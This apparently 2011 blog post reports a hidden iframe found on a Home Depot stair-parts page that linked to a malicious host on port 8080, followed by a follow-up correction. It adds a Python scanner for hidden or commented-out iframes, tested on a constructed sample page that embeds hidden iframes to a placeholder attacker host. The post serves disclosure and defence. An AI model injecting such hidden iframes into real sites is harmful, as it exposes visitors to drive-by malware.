It is interesting how a minor home improvement project can result in the discovery of a hack on a major retail website. It all started with a simple Google search for “home depot stair spindles”.
The first unpaid result in the search is hxxp://www6.homedepot.com/stairparts/gallery.html as shown above.
As it turns out, there is an invisible iframe in this page that links to the external site vwui.in on port 8080 as shown below.
As can be seen in the screenshot, the below code has been injected into the page:
The site vwui.com is listed as a malicious site by both Google and StopBadWare with one listing going back to July of 2009.
After I discovered this hack I decided to investigate the vwui.in site to try and determine what type of malware it was hosting. As it turns out, this domain no longer resolves.
[prompt ~]$ host vwui.in
Host vwui.in not found: 3(NXDOMAIN)
StopBadWare lists the IP associated with this domain as which according to the whois database belongs to ThePlanet.com Internet Services.
[prompt ~]$ whois
[Querying whois.arin.net]
[whois.arin.net]
Optical Jungle EVRY-753 (NET-209-85-51-0-1) 209.85.51.0 –
ThePlanet.com Internet Services, Inc. NETBLK-THEPLANET-BLK-EV1-15 (NET-209-85-0-0-1) 209.85.0.0 –
Furthermore, when accessing this IP in a browser it redirects to hxxp://searchmanified.com which also appears to be serving up some type of malware.
So how did this page on Home Depot’s website get compromised? While it’s not possible for me to know for certain without doing a complete investigation, I can make an educated guess. Typically, these types of attacks use one of several attack vectors:
- Compromised FTP credentials due to a weak password
- Brute force compromise of server credentials
- SQL injection
Back in 2009 tens of thousands of web sites were injected with hidden iframes that attempted to download malware when a visitor accessed one of the compromised sites. In many cases these attacks took advantage of SQL injection vulnerabilities to insert the hidden iframe. They also tended to host their malware on port 8080 rather than the standard port 80. Given the fact that the server vwui.in was first listed as a malicious site back in 2009, that the malicious site uses port 8080, and the fact that it no longer has any associated DNS records, it is quite possible that the Home Depot page was originally compromised as part of this massive attack in 2009 and only now has been discovered. While the iframe in the Home Depot website is not currently a threat, the vulnerability that allowed it to be inserted into the page may still be present which could lead to a future compromise of this site. I attempted to contact Home Depot to inform them of this issue, but as of this writing I have not received a response.
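To make the detection side of this concrete, here is an added example (my own code, not from the original post and not anything from Home Depot’s site) that scans an HTML document for iframes that are hidden, point at an external host, or use a non-standard port such as 8080, and that also looks inside HTML comments so an iframe that was commented out rather than deleted is still reported. The host malicious.example, the page URL and the sample page are constructed placeholders for illustration.

```python
"""Added example (not from the original post): flag hidden or suspicious
iframes in an HTML document, including iframes left inside HTML comments."""
import re
from dataclasses import dataclass
from html.parser import HTMLParser
from typing import List, Optional
from urllib.parse import urlsplit

# CSS patterns commonly used to keep an injected iframe invisible or off-screen.
HIDDEN_STYLE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden"
    r"|(?:width|height)\s*:\s*0*[01](?:px)?\b"
    r"|(?:left|top)\s*:\s*-\d{3,}",
    re.I,
)
STANDARD_PORTS = {None, 80, 443}


@dataclass
class Finding:
    src: str
    host: str
    port: Optional[int]
    in_comment: bool
    reasons: List[str]


def _is_hidden(attrs: dict) -> bool:
    """True for a hidden attribute, a 0/1 pixel size, or hiding CSS."""
    tiny = {"0", "1"}
    return (
        "hidden" in attrs
        or attrs.get("width", "").strip().rstrip("px") in tiny
        or attrs.get("height", "").strip().rstrip("px") in tiny
        or bool(HIDDEN_STYLE.search(attrs.get("style", "")))
    )


def inspect_iframe(attrs: dict, page_host: str, in_comment: bool) -> Optional[Finding]:
    """Return a Finding when the iframe looks injected, else None."""
    src = attrs.get("src", "")
    parts = urlsplit(src)
    host = (parts.hostname or page_host).lower()  # relative src -> same host
    try:
        port = parts.port
    except ValueError:  # malformed port in the URL; treat as unknown
        port = None
    hidden = _is_hidden(attrs)
    nonstandard = port not in STANDARD_PORTS
    # A visible embed on a standard port is normal; only report when something is off.
    if not (hidden or nonstandard or in_comment):
        return None
    reasons = []
    if host != page_host and not host.endswith("." + page_host):
        reasons.append(f"external host {host!r}")
    if nonstandard:
        reasons.append(f"non-standard port {port}")
    if hidden:
        reasons.append("hidden styling or zero/one-pixel size")
    if in_comment:
        reasons.append("inside HTML comment")
    return Finding(src, host, port, in_comment, reasons)


class IframeCollector(HTMLParser):
    """Collects suspicious <iframe> tags; comment bodies are re-parsed so a
    commented-out iframe is reported too."""

    def __init__(self, page_host: str, in_comment: bool = False) -> None:
        super().__init__()
        self.page_host = page_host.lower()
        self.in_comment = in_comment
        self.findings: List[Finding] = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "iframe":
            return
        normalized = {k.lower(): (v or "") for k, v in attrs}
        finding = inspect_iframe(normalized, self.page_host, self.in_comment)
        if finding:
            self.findings.append(finding)

    def handle_comment(self, data):
        sub = IframeCollector(self.page_host, in_comment=True)
        sub.feed(data)
        sub.close()
        self.findings.extend(sub.findings)


def scan_html(html: str, page_url: str) -> List[Finding]:
    parser = IframeCollector(urlsplit(page_url).hostname or "")
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample page modelled on the case above: a same-site iframe, a visible
# third-party embed, an injected 1x1 hidden iframe to a placeholder host on port
# 8080, and the same injected iframe commented out instead of removed.
SAMPLE_HTML = """
<html><body>
<h1>Stair Parts Gallery</h1>
<iframe src="/stairparts/video.html" width="640" height="480"></iframe>
<iframe src="https://video.example/embed/123" width="640" height="360"></iframe>
<iframe src="http://malicious.example:8080/loader.html" width="1" height="1"
        style="visibility:hidden"></iframe>
<!-- <iframe src="http://malicious.example:8080/loader.html" style="display:none"></iframe> -->
</body></html>
"""

if __name__ == "__main__":
    for f in scan_html(SAMPLE_HTML, "http://www.example.com/stairparts/gallery.html"):
        state = "commented-out" if f.in_comment else "live"
        print(f"{state} iframe -> {f.src}: " + "; ".join(f.reasons))
```

Running it against a saved copy of a page reports the two placeholder iframes and ignores the same-site and visible third-party embeds; a scheduled run over a site’s static pages, diffed against the previous run, is a cheap way to catch this kind of injection long before a visitor’s antivirus does.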
Tags: Hidden Iframe, Home Depot Hack
Pingback from on January 11, 2011 at 1:31 am
I would like to thank Scott Frost and Steve Bush for pointing out that the malicious iframe I discovered on the Home Depot web site had been commented out. This was an oversight on my part and was not left out of the article intentionally. Nevertheless, the point of my story is the same. At some time in the past this page was injected with an iframe that linked to a malicious web site. It is reasonable to assume that this code was active and likely did result in the infection of some Home Depot site visitors’ PCs. This iframe must have been detected by Home Depot at some point and the developer decided to comment out the iframe rather than delete it. The malicious site in question was also taken down at some point. It is worth noting that my AV software still detected the commented iframe (nice job Avast) which is what led me to the discovery.